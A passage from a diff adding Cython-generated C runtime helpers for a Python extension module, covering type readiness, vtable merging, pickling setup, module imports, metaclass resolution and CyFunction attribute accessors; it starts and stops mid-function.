Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetVTable */ +static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ +static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__5; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* Py3UpdateBases */ +static PyObject* +__Pyx_PEP560_update_bases(PyObject *bases) +{ + Py_ssize_t i, j, size_bases; + PyObject *base, *meth, *new_base, *result, *new_bases = NULL; + size_bases = PyTuple_GET_SIZE(bases); + for (i = 0; i < size_bases; i++) { + base = PyTuple_GET_ITEM(bases, i); + if (PyType_Check(base)) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + meth = __Pyx_PyObject_GetAttrStrNoError(base, __pyx_n_s_mro_entries); + if (!meth && PyErr_Occurred()) { + goto error; + } + if (!meth) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + new_base = __Pyx_PyObject_CallOneArg(meth, bases); + Py_DECREF(meth); + if (!new_base) { + goto error; + } + if (!PyTuple_Check(new_base)) { + PyErr_SetString(PyExc_TypeError, + "__mro_entries__ must return a tuple"); + Py_DECREF(new_base); + goto error; + } + if (!new_bases) { + if (!(new_bases = PyList_New(i))) { + goto error; + } + for (j = 0; j < i; j++) { + base = PyTuple_GET_ITEM(bases, j); + PyList_SET_ITEM(new_bases, j, base); + Py_INCREF(base); + } + } + j = PyList_GET_SIZE(new_bases); + if (PyList_SetSlice(new_bases, j, j, new_base) < 0) { + goto error; + } + Py_DECREF(new_base); + } + if (!new_bases) { + Py_INCREF(bases); + return bases; + } + result = PyList_AsTuple(new_bases); + Py_DECREF(new_bases); + return result; +error: + Py_XDECREF(new_bases); + return NULL; +} + +/* CalculateMetaclass */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases) { + Py_ssize_t i, nbases = PyTuple_GET_SIZE(bases); + for (i=0; i < nbases; i++) { + PyTypeObject *tmptype; + PyObject *tmp = PyTuple_GET_ITEM(bases, i); + tmptype = Py_TYPE(tmp); +#if PY_MAJOR_VERSION < 3 + if (tmptype == &PyClass_Type) + continue; +#endif + if (!metaclass) { + metaclass = tmptype; + continue; + } + if (PyType_IsSubtype(metaclass, tmptype)) + continue; + if (PyType_IsSubtype(tmptype, metaclass)) { + metaclass = tmptype; + continue; + } + PyErr_SetString(PyExc_TypeError, + "metaclass conflict: " + "the metaclass of a derived class " + "must be a (non-strict) subclass " + "of the metaclasses of all its bases"); + return NULL; + } + if (!metaclass) { +#if PY_MAJOR_VERSION < 3 + metaclass = &PyClass_Type; +#else + metaclass = &PyType_Type; +#endif + } + Py_INCREF((PyObject*) metaclass); + return (PyObject*) metaclass; +} + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + 